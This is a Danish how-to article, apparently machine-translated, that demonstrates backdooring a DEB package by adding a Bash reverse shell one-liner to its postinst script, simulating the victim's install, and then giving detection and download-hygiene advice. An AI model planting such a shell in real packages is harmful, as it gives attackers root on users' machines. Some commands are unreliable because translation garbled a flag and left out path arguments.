Vidste du, at angribere kan ændre scripts pakket i en DEB-fil for at få uautoriseret adgang til din pc? Her er, hvordan DEB-pakker er bagdøre.
Nøgle takeaways
- DEB-pakker kan let bagdøre, hvilket giver hackere mulighed for at injicere ondsindet kode i dit system, når du installerer dem med root-tilladelser.
- Inficerede DEB-pakker er svære at opdage, da de muligvis ikke er markeret af antivirussoftware eller cloud-løsninger som VirusTotal.
- For at beskytte dig selv skal du undgå at downloade DEB-pakker fra tilfældige sider, holde dig til officielle downloadsider eller fællesskabsbetroede websteder, og overvej at installere sikkerhedsværktøjer for at sikre dit Linux-system mod netværk angreb.
DEB-filer er softwarepakker, der er det primære format for forsendelse af software på Debian-baserede Linux-distributioner.
For at installere DEB-pakker skal du bruge en pakkehåndtering som dpkg med root-tilladelser. Angribere udnytter dette og injicerer bagdøre i disse pakker. Når du installerer dem med dpkg eller en hvilken som helst anden pakkehåndtering, bliver den ondsindede kode også eksekveret ved siden af og kompromitterer dit system.
Lad os undersøge præcis, hvordan DEB-pakker er bagdøre, og hvad du kan gøre for at beskytte dig selv.
Hvordan er DEB-pakker bagdøre?
Før du forstår, hvordan DEB-pakker er bagdøre, lad os undersøge, hvad der er inde i en DEB-pakke. Til demonstration vil jeg downloade Microsoft Visual Studio Code DEB-pakken fra det officielle Microsoft-websted. Dette er den samme pakke, som du vil downloade, hvis du vil installere VS Code på Linux.
Hent:Visual Studio kode
Nu hvor du har downloadet målpakken, er det tid til at pakke den ud. Du kan pakke en DEB-pakke ud ved hjælp af dpkg-deb kommando med -R flag efterfulgt af stien til at gemme indholdet:
dpkg-deb -R Dette bør udtrække indholdet af VS Code-pakken.
Når du flytter ind i mappen, vil du finde flere mapper, men vores interesse ligger kun i DEBIAN vejviser. Denne mappe indeholder vedligeholdelsesscripts, der bliver udført under installationen med root-rettigheder. Som du måske allerede har regnet ud, ændrer angriberne scripts i denne mappe.
Til demonstration vil jeg ændre postinst script og tilføje en simpel one-liner Bash reverse TCP shell. Som navnet antyder, er det et script, der bliver eksekveret efter pakken er installeret på systemet.
Den indeholder kommandoer, der afslutter konfigurationerne, såsom opsætning af symbolske links, afhængighedshåndtering og mere. Du kan finde tonsvis af forskellige omvendte skaller på internettet. De fleste af dem vil fungere på samme måde. Her er prøven omvendt shell one-liner:
bash -i >& /dev/tcp/127.0.0.1/42069 0>&1Forklaring af kommandoen:
- bash: Dette er kommandoen, der kalder Bash-skallen.
- -jeg: Flaget fortæller Bash at køre i interaktiv tilstand, hvilket tillader kommando I/O i realtid.
-
>& /dev/tcp/ip/port: Dette omdirigerer standard output og standard fejl til et netværksstik, hvilket i det væsentlige etablerer en TCP-forbindelse til
og . - 0>&1: Dette omdirigerer input og output til den samme placering, dvs. til netværksstikket.
For de uindviede er en omvendt skal en type kode, der, når den udføres på målmaskinen, starter en forbindelse tilbage til angriberens maskine. Omvendte skaller er en fantastisk måde at omgå firewall-restriktioner, da trafikken genereres fra maskinen bag firewallen.
Sådan ser det ændrede script ud:
Som du kan se, er alt det samme, men kun én linje er blevet tilføjet, dvs. vores Bash reverse shell. Nu skal du bygge filerne tilbage i ".deb" format. Brug blot dpkg kommando med --bygge flag eller brug dpkg-deb med -b flag efterfulgt af stien til det udpakkede indhold:
dpkg --build
dpkg-deb -b Nu er den bagdørs DEB-pakke klar til at blive sendt på ondsindede websteder. Lad os simulere et scenario, hvor et offer har downloadet DEB-pakken til deres system og installerer den som enhver anden almindelig pakke.
Den øverste terminalrude er til offerets POV, og den nederste er angriberens POV. Offeret installerer pakken med sudo dpkg -i og angriberen lytter tålmodigt efter indgående forbindelser ved hjælp af netcat kommando i Linux.
Så snart installationen er færdig, skal du bemærke, at angriberen får den omvendte skalforbindelse og nu har root-adgang til offerets system. Nu ved du, hvordan DEB-pakker er bagdøre. Lad os nu lære, hvordan du kan beskytte dig selv.
Sådan registrerer du, om en DEB-pakke er skadelig
Nu hvor du ved, at inficerede DEB-pakker er en ting, må du undre dig over, hvordan du finder de inficerede. Til at begynde med kan du prøve at bruge en Linux antivirus software ligesom ClamAV. Desværre, da en ClamAV-scanning blev kørt på pakken, blev den ikke markeret som ondsindet. Her er resultatet af scanningen:
Så medmindre du har en premium antivirusløsning på plads (som ikke er en garanti for, at du ikke bliver hacket), er det ret svært at opdage ondsindede DEB-pakker. Lad os prøve at bruge en cloud-løsning som VirusTotal-webstedet:
Som du kan se, opdagede VirusTotal ikke noget galt med det. Nå, den eneste måde at beskytte dig selv mod sådanne trusler er at følge grundlæggende sikkerhedshygiejne som ikke at downloade filer fra ukendte kilder, altid tjekker hashen af en fil, og generelt undgå at installere lyssky software.
Internettet er fyldt med sådanne trusler. Den eneste måde at surfe på uden at miste dine data er at have forstand på dig og gennemse pålidelige websteder. Derudover bør du til Linux også prøve at finde ud af, om den software, du downloader, har en AppImage variant da de er selvstændige og kan være i sandkasse og dermed holdes ude af kontakt med dit system.
Download ikke DEB-pakker fra tilfældige websteder!
DEB-pakker er ikke i sig selv dårlige, men angribere kan nemt våben og sende dem til intetanende brugere. Som vist kan en DEB-pakke nemt åbnes og ændres for at tilføje brugerdefineret kode med kun nogle få kommandoer, hvilket gør den til en almindelig vektor for forsendelse af malware.
Selv simple bagdøre på DEB-pakker forbliver ufanget af de bedste antivirusløsninger. Så den bedste ting at gøre er at spille sikkert, bære din sunde fornuft, mens du surfer på nettet, og altid kun downloade software fra officielle downloadsider eller websteder, der er betroede af fællesskabet.
Nu hvor du er klar over de sikkerhedsrisici, der følger med at installere DEB-pakker fra nye eller ukendte websteder, bør du være forsigtig, når du installerer ny software. Det er dog ikke nok at være forsigtig med, hvad du installerer. Dit Linux-system kan også være et mål for netværksangreb.
For at sikre, at du er sikker i tilfælde af et netværksangreb, bør du overveje at installere netværkssikkerhedsværktøjer.
